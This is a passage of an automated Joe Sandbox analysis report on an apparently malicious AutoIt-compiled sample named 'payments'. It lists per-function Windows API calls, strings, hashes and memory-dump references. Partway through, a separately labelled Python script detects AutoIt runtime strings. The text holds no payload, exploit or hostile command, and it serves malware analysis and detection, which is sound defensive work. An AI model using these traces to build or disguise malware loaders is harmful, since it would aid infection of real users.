                                                                                                                            • Part of subcall function 00CFD575: SelectObject.GDI32(?,?), ref: 00CFD625
                                                                                                                            • Part of subcall function 00CFD575: InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD644
                                                                                                                            • Part of subcall function 00CFD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFD65B
                                                                                                                            • Part of subcall function 00CFD575: GetWindowLongW.USER32(00000000,000000F0), ref: 00CFD670
                                                                                                                            • Part of subcall function 00CFD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CFD698
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                          • String ID: @U=u
                                                                                                                          • API String ID: 3521893082-2594219639
                                                                                                                          • Opcode ID: 1a75cae89b519f534301fa8c4f2e6fc2256f74b5453151456baaf71dde0a3285
                                                                                                                          • Instruction ID: 1bf0f84cb64572e02b4d33891cc35f0951d0a7abb8a3728a446836d7a99668ed
                                                                                                                          • Opcode Fuzzy Hash: 1a75cae89b519f534301fa8c4f2e6fc2256f74b5453151456baaf71dde0a3285
                                                                                                                          • Instruction Fuzzy Hash: D3918071408305BFD7509F64DC08AAB7BABFF89325F104A19FA62D62E0CB35D945CB62
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32 ref: 00CAB98B
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CAB9CD
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00CAB9D8
                                                                                                                          • DestroyIcon.USER32(00000000), ref: 00CAB9E3
                                                                                                                          • DestroyWindow.USER32(00000000), ref: 00CAB9EE
                                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D0D2AA
                                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D0D2E3
                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00D0D711
                                                                                                                            • Part of subcall function 00CAB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CAB759,?,00000000,?,?,?,?,00CAB72B,00000000,?), ref: 00CABA58
                                                                                                                          • SendMessageW.USER32 ref: 00D0D758
                                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D0D76F
                                                                                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00D0D785
                                                                                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00D0D790
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                          • String ID: 0$@U=u
                                                                                                                          • API String ID: 464785882-975001249
                                                                                                                          • Opcode ID: 0402d917fe2cdc129367f5587e986c16354529fe311b65bb72dcf7dbb5b1b6b7
                                                                                                                          • Instruction ID: 278a3dc4a8a1ee74ceb48bac7c7a02d3df2a6e341f50660e694d6af02fe9ff81
                                                                                                                          • Opcode Fuzzy Hash: 0402d917fe2cdc129367f5587e986c16354529fe311b65bb72dcf7dbb5b1b6b7
                                                                                                                          • Instruction Fuzzy Hash: 7A128230504202EFDB15CF64C888BAAB7F6FF45304F58456AE989CB2A2C731EC46DB61
                                                                                                                          APIs
                                                                                                                          • GetSysColor.USER32(00000012), ref: 00CFD5AE
                                                                                                                          • SetTextColor.GDI32(?,?), ref: 00CFD5B2
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00CFD5C8
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00CFD5D3
• CreateSolidBrush.GDI32(?), ref: 00CFD5D8
• GetSysColor.USER32(00000011), ref: 00CFD5F0
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFD5FE
• SelectObject.GDI32(?,00000000), ref: 00CFD60F
• SetBkColor.GDI32(?,00000000), ref: 00CFD618
• SelectObject.GDI32(?,?), ref: 00CFD625
• InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD644
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFD65B
• GetWindowLongW.USER32(00000000,000000F0), ref: 00CFD670
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CFD698
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CFD6BF
• InflateRect.USER32(?,000000FD,000000FD), ref: 00CFD6DD
• DrawFocusRect.USER32(?,?), ref: 00CFD6E8
• GetSysColor.USER32(00000011), ref: 00CFD6F6
• SetTextColor.GDI32(?,00000000), ref: 00CFD6FE
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CFD712
• SelectObject.GDI32(?,00CFD2A5), ref: 00CFD729
• DeleteObject.GDI32(?), ref: 00CFD734
• SelectObject.GDI32(?,?), ref: 00CFD73A
• DeleteObject.GDI32(?), ref: 00CFD73F
• SetTextColor.GDI32(?,?), ref: 00CFD745
• SetBkColor.GDI32(?,?), ref: 00CFD74F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID: @U=u
• API String ID: 1996641542-2594219639
• Opcode ID: b6f8809c83d82f982a88f9a7e4ea9c5f4649b9852e5de99498185e1b75ab28a5
• Instruction ID: 967e5cd38e214a3c85f7d8eb065a85c0c535d2eca251711f31dd4283346a7689
• Opcode Fuzzy Hash: b6f8809c83d82f982a88f9a7e4ea9c5f4649b9852e5de99498185e1b75ab28a5
• Instruction Fuzzy Hash: 72513D71900318BFDB109FA4DC48AEE7B7AEB09324F108515FA16EB2A1DB759A41DB60
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00CDDBD6
• GetDriveTypeW.KERNEL32(?,00D2DC54,?,\\.\,00D2DC00), ref: 00CDDCC3
• SetErrorMode.KERNEL32(00000000,00D2DC54,?,\\.\,00D2DC00), ref: 00CDDE29
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: de2830233a54b42fa9af177855801961acec4722d5478212a175caf053efe108
• Instruction ID: ee229176c8eccbfbfb0f0c9daaa4e4e87b341f9817afb2aa15463a976850e3cc
• Opcode Fuzzy Hash: de2830233a54b42fa9af177855801961acec4722d5478212a175caf053efe108
• Instruction Fuzzy Hash: 4551A630A48742AF8B10DF29C885929B7E2FB94705B24481BF25797391DB70DA49E762
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00CFC788
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00CFC83E
• SendMessageW.USER32(?,00001102,00000002,?), ref: 00CFC859
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 00CFCB15
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: 0$@U=u
• API String ID: 2326795674-975001249
• Opcode ID: 4d588053cd3e9cbda5e5e1ed898752ce6c76701695ebb69afc2c2736fed86718
• Instruction ID: 764ad056dedb21634113ef05cf0d64fd246b1ff78d7956cbaaa0a79f475a671f
• Opcode Fuzzy Hash: 4d588053cd3e9cbda5e5e1ed898752ce6c76701695ebb69afc2c2736fed86718
• Instruction Fuzzy Hash: 35F1127420430DAFE7608F24C9C5BBABBE5FF49344F084519F6A8D62A1C774DA41DBA2
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Opcode ID: e995c31840fa30f2dd18e8a9786b4f595fe0782fbb3974cf768a9f76d2e217db
• Instruction ID: 71bc852a3b8ea65e4bd24347305be24d2c15f990d80a1772334c12b820430ba9
• Opcode Fuzzy Hash: e995c31840fa30f2dd18e8a9786b4f595fe0782fbb3974cf768a9f76d2e217db
• Instruction Fuzzy Hash: D2812A316402167BCF14AF65DCDAFFF3B69AF25744F084028F909A61C2EB61DA05D2B1
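The string list of the `__wcsnicmp` function above (`#include`, `#include-once`, `#requireadmin`, `#pragma compile`, `#notrayicon`, plus the parser messages `Bad directive syntax error`, `Cannot parse #include` and `Unterminated group of comments`) is the AutoIt interpreter's own directive parser, which is the kind of evidence that marks a sample as a compiled AutoIt script wrapping the real payload. The triage script below is an added example, not part of the Joe Sandbox report or of any AutoIt tooling. It scans a file or a dumped memory region for exactly those strings in both ASCII and UTF-16LE (the function compares them with `__wcsnicmp`, i.e. as wide strings, so an ASCII-only scan can miss them) and reports a verdict. `build_sample()` is a constructed stand-in for a memory dump, and the scoring threshold in `classify()` is an assumption for the demonstration, not a rule taken from the report.

```python
"""
Triage check for compiled-AutoIt binaries (added example, not report code).

Looks for the AutoIt interpreter's directive names and parser error messages,
exactly as listed in the report's __wcsnicmp function, in a file or memory
dump. AutoIt compares these as wide strings, so UTF-16LE is scanned as well
as ASCII.
"""
import sys

# Strings copied from the report's String ID for the __wcsnicmp function.
DIRECTIVES = (
    "#OnAutoItStartRegister", "#comments-end", "#comments-start",
    "#include-once", "#include", "#notrayicon", "#pragma compile",
    "#requireadmin", "#cs", "#ce",
)
PARSER_ERRORS = (
    "Bad directive syntax error",
    "Cannot parse #include",
    "Unterminated group of comments",
)
# "#cs" and "#ce" collide with ordinary text, so only directives of at least
# this length count towards the verdict (assumption, not from the report).
MIN_STRONG_LEN = 8

ENCODINGS = (("ascii", "ascii"), ("utf-16le", "utf-16-le"))


def find_markers(data: bytes, needles):
    """Return {needle: [(encoding, offset), ...]} for every needle present."""
    found = {}
    for text in needles:
        for label, codec in ENCODINGS:
            off = data.find(text.encode(codec))
            if off != -1:
                found.setdefault(text, []).append((label, off))
    return found


def classify(data: bytes):
    """Score the directive/error evidence and return a summary dict."""
    directives = find_markers(data, DIRECTIVES)
    errors = find_markers(data, PARSER_ERRORS)
    strong = sorted(d for d in directives if len(d) >= MIN_STRONG_LEN)
    all_hits = list(directives.values()) + list(errors.values())
    wide = sum(1 for hits in all_hits for enc, _ in hits if enc == "utf-16le")
    # Heuristic threshold (assumption): several long directives together with
    # at least one of the interpreter's own error messages.
    likely = len(strong) >= 3 and len(errors) >= 1
    return {
        "strong_directives": strong,
        "parser_errors": sorted(errors),
        "wide_hits": wide,
        "likely_autoit": likely,
    }


def build_sample() -> bytes:
    """Constructed stand-in for a memory dump: filler plus embedded markers."""
    blob = bytearray(b"MZ" + b"\x00" * 60 + b"PE\x00\x00" + bytes(range(256)) * 4)
    # One marker stored as ASCII, the rest as UTF-16LE, as the runtime would.
    blob += b"#OnAutoItStartRegister\x00" + b"\xCC" * 16
    for s in ("#include-once", "#requireadmin", "#pragma compile",
              "#notrayicon", "Cannot parse #include",
              "Unterminated group of comments"):
        blob += s.encode("utf-16-le") + b"\x00\x00" + b"\xCC" * 16
    return bytes(blob)


def main(argv):
    # With a path argument scan that file or dump; otherwise use the sample.
    data = open(argv[1], "rb").read() if len(argv) > 1 else build_sample()
    for key, value in classify(data).items():
        print(f"{key}: {value}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it against the sample itself or against a dumped region (`python autoit_check.py payments.exe`; the file name is whatever you saved the script as). A positive result identifies the AutoIt runtime, not the payload it carries, so it is a cue to extract and decompile the embedded script rather than a verdict on what that script does.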
APIs
• CharUpperBuffW.USER32(?,?,00D2DC00), ref: 00CF6449
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 3964851224-45149045
• Opcode ID: 297eaa584162884e7c26f541a3528aefda9c4fb3a09ca11446e70b6a3430160d
• Instruction ID: a2be02173ccb72c0f2a453a6f2ce7be7f86339ebbc1fcab43f1f5bd210f0ab75
• Opcode Fuzzy Hash: 297eaa584162884e7c26f541a3528aefda9c4fb3a09ca11446e70b6a3430160d
• Instruction Fuzzy Hash: 6FC1B13020420A9BCB44FF10C551A7E77A5AF95358F00485DF9966B3E2DB31EE4BEB92
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CFB7B0
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CFB7C1
• CharNextW.USER32(0000014E), ref: 00CFB7F0
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CFB831
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CFB847
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CFB858
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CFB875
• SetWindowTextW.USER32(?,0000014E), ref: 00CFB8C7
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CFB8DD
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00CFB90E
• _memset.LIBCMT ref: 00CFB933
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CFB97C
• _memset.LIBCMT ref: 00CFB9DB
• SendMessageW.USER32 ref: 00CFBA05
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00CFBA5D
• SendMessageW.USER32(?,0000133D,?,?), ref: 00CFBB0A
• InvalidateRect.USER32(?,00000000,00000001), ref: 00CFBB2C
• GetMenuItemInfoW.USER32(?), ref: 00CFBB76
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CFBBA3
• DrawMenuBar.USER32(?), ref: 00CFBBB2
• SetWindowTextW.USER32(?,0000014E), ref: 00CFBBDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0$@U=u
• API String ID: 1073566785-975001249
• Opcode ID: e8f4418969dbecf09b164b1198ed238ca5504f24dd974e13b02acd0ef5e67aca
• Instruction ID: 57d94000629491ade0ddc60058b895c7e97dffbf06ad058f078d12ddbdb87d13
• Opcode Fuzzy Hash: e8f4418969dbecf09b164b1198ed238ca5504f24dd974e13b02acd0ef5e67aca
• Instruction Fuzzy Hash: CAE18C7590021CABDF609FA1CC84EFE7B79EF05754F108156FA29AA290DB708E41DF62
APIs
• GetCursorPos.USER32(?), ref: 00CF778A
• GetDesktopWindow.USER32 ref: 00CF779F
• GetWindowRect.USER32(00000000), ref: 00CF77A6
• GetWindowLongW.USER32(?,000000F0), ref: 00CF7808
• DestroyWindow.USER32(?), ref: 00CF7834
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CF785D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CF787B
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CF78A1
• SendMessageW.USER32(?,00000421,?,?), ref: 00CF78B6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CF78C9
• IsWindowVisible.USER32(?), ref: 00CF78E9
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CF7904
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CF7918
• GetWindowRect.USER32(?,?), ref: 00CF7930
• MonitorFromPoint.USER32(?,?,00000002), ref: 00CF7956
• GetMonitorInfoW.USER32 ref: 00CF7970
• CopyRect.USER32(?,?), ref: 00CF7987
• SendMessageW.USER32(?,00000412,00000000), ref: 00CF79F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                          • Opcode ID: f5d28521ac2ae3c7b35489256b8bcd5af4eae6a9b63564fbe0bff8ff8365f560
                                                                                                                          • Instruction ID: 17ce067cc0a279c8e11c8b593279430fde9f3d964d1261f82724a3858bbdff95
                                                                                                                          • Opcode Fuzzy Hash: f5d28521ac2ae3c7b35489256b8bcd5af4eae6a9b63564fbe0bff8ff8365f560
                                                                                                                          • Instruction Fuzzy Hash: AFB1A171608305AFDB44DF64C949B6ABBE5FF88310F008A1DF5999B291DB70ED05CBA2
                                                                                                                          APIs
                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00CD6CFB
                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00CD6D21
                                                                                                                          • _wcscpy.LIBCMT ref: 00CD6D4F
                                                                                                                          • _wcscmp.LIBCMT ref: 00CD6D5A
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6D70
                                                                                                                          • _wcsstr.LIBCMT ref: 00CD6D7B
                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CD6D97
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6DE0
                                                                                                                          • _wcscat.LIBCMT ref: 00CD6DE7
                                                                                                                          • _wcsncpy.LIBCMT ref: 00CD6E12
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                          • API String ID: 699586101-1459072770
                                                                                                                          • Opcode ID: 9d63754d496e89bc0714db690eb142684f10b76049eb0fedc8d9b814baae51f3
                                                                                                                          • Instruction ID: 06354eab2d3353757422ab12e10239bad50ff919e79de0b14705ba448cb500c4
                                                                                                                          • Opcode Fuzzy Hash: 9d63754d496e89bc0714db690eb142684f10b76049eb0fedc8d9b814baae51f3
                                                                                                                          • Instruction Fuzzy Hash: 3B41D672A002117FEB00AB65DC47EFF77BCDF55714F14006AFA01A2282EB749A05E6B2
                                                                                                                          APIs
                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CAA939
                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00CAA941
                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CAA96C
                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00CAA974
                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00CAA999
                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00CAA9B6
                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00CAA9C6
                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00CAA9F9
                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00CAAA0D
                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00CAAA2B
                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00CAAA47
                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CAAA52
                                                                                                                            • Part of subcall function 00CAB63C: GetCursorPos.USER32(000000FF), ref: 00CAB64F
                                                                                                                            • Part of subcall function 00CAB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00CAB66C
                                                                                                                            • Part of subcall function 00CAB63C: GetAsyncKeyState.USER32(00000001), ref: 00CAB691
                                                                                                                            • Part of subcall function 00CAB63C: GetAsyncKeyState.USER32(00000002), ref: 00CAB69F
                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,00CAAB87), ref: 00CAAA79
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                          • String ID: @U=u$AutoIt v3 GUI
                                                                                                                          • API String ID: 1458621304-2077007950
                                                                                                                          • Opcode ID: 0038a7e764f44f6e40ec486d452aa4c5f974d63ee3eeac51b2085cf1e627bc8a
                                                                                                                          • Instruction ID: 3efd46dac3e05ddebdd09ef33d95d820e908b60d1b6cd325ed4a44fd7011a421
                                                                                                                          • Opcode Fuzzy Hash: 0038a7e764f44f6e40ec486d452aa4c5f974d63ee3eeac51b2085cf1e627bc8a
                                                                                                                          • Instruction Fuzzy Hash: FFB18775A0030AAFDB14DFA8DC45BEE7BB6FB09315F114229FA15E62D0DB34A841CB61
                                                                                                                          APIs
                                                                                                                          • LoadIconW.USER32(00000063), ref: 00CCEAB0
                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CCEAC2
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00CCEAD9
                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00CCEAEE
                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00CCEAF4
                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00CCEB04
